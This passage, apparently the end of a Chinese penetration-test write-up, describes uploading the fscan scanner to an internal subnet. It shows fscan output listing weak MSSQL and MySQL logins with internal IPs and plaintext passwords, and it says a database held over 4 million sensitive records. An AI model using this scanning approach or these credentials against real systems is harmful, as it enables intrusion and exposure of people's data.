然后再上传fscan扫那个网段,后面是扫出来2个mssql弱口令和1个mysql弱口令,mysql数据库里面藏着400w+的敏感信息。
[+] mssql:10.10.103.204:1433:sa 111111
[+] mssql:10.10.103.34:1433:sa 111111
[+] mysql:10.10.103.238:3306:root root@123
|
后面的内网渗透就不细讲了,该拿的机子拿拿内网就可以算打穿了,主要讲讲前面曲折的渗透过程。
后续
后面查找了下logs路径下的文件:
看日志像是刚开起来的站没多久,所以会有页面默认密码填入的情况,加上注册接口开放。
也正是这某个小系统的一个注册接口的开放,导致了整个内网被入侵。但没有测到那个日志文件我可能就会放弃了,所以渗透也需要看一点运气,99%的实力和1%的运气。
狗运,无需多言!!渗透结束,下班!!!!
